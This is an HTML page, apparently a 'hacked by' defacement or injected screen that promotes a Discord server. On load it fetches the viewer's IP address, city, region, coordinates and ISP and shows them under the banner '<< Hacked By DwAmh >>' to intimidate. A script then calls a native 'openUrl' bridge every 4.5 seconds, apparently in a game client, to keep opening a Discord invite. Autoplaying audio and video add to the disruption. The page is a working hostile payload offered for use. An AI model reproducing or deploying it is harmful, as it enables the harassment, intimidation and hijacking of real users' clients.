<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/e5</title>
    <style>
       body {
            margin: 0;
            padding: 0;
            background: black;
            font-family: 'Courier New', Courier, monospace;
            color: red;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
            overflow: hidden;
        }
        #content {
            display: none;
            opacity: 0;
            transition: opacity 2s ease;
        }
        .image-container img {
            width: 400px; 
            height: auto;
            border: 2px solid red; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, 0, 0, 0.7); 
        }
          .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: red; 
            text-shadow: 0 0 8px red, 0 0 15px red, 0 0 25px red;
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 5px;
            font-size: 75px; 
            color: red; 
            text-shadow: 0 0 8px red, 0 0 15px red, 0 0 25px red; 
            letter-spacing: 4.5px;
        }
        .video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
            z-index: -1;
        }
        .video-container video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            filter: blur(15px);
        }
    </style>
</head>
<body>
    <div class="video-container">
        <video autoplay loop muted>
            <source src="https://i.top4top.io/m_3243zidf01.mov" type="video/mp4">
            Your browser does not support the video tag.
        </video>
    </div>

    <div class="gif-container">
        <img src="https://cdn.discordapp.com/attachments/1345790238580150354/1345810802573312061/standard_1.gif?ex=67c5e77b&is=67c495fb&hm=c6e23c7455113f8b54fbf584bbbdaf48e3aa8e8237f3229f90981a6bcdf3dc56&" alt="">
    </div>

    <div id="content">
        <div class="image-container">
            <img src="https://cdn.discordapp.com/attachments/1345790238580150354/1345810802573312061/standard_1.gif?ex=67c5e77b&is=67c495fb&hm=c6e23c7455113f8b54fbf584bbbdaf48e3aa8e8237f3229f90981a6bcdf3dc56&" alt="">
        </div>

        <audio autoplay loop>
            <source src="https://cdn.discordapp.com/attachments/1345790238580150354/1345807504428236861/95c3f2b5ef40dc50.mp3?ex=67c5e468&is=67c492e8&hm=f261517634bb96f8e85fe570a9d6666ca6aa986fa622b25d4c7cfe2d8a1c2a97&" type="audio/mpeg">
            Your browser does not support the audio element.
        </audio>
        <div class="info" id="ip-info"></div>
        <div class="text">discord.gg/5-1</div>
    </div>

    <script>
        setTimeout(() => {
            document.querySelector('.gif-container').style.display = 'none';
            const content = document.getElementById('content');
            content.style.display = 'block';
            setTimeout(() => {
                content.style.opacity = 1;
            }, 150); 
        }, 200);

        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = ` << Hacked By DwAmh >>
<strong>IP:</strong><span style='color: red;'>"${ip}"</span><br>
<strong>City:</strong><span style='color: red;'>"${city}"</span><br>
<strong>Region:</strong><span style='color: red;'>"${region}"</span><br>
<strong>Country:</strong><span style='color: red;'>"${country}"</span><br>
<strong>Location:</strong><span style='color: red;'>"${loc}"</span><br>
<strong>ISP:</strong> <span style='color: red;'>"${org}"</span><br>
<strong>Timezone:</strong><span style='color: red;'>"${timezone}"</span>`;
        });

        setInterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/6x8PJ7qW");
            window.invokeNative("openUrl", "https://discord.gg/6x8PJ7qW");
        }, 4500);
    </script>
</body>
</html>
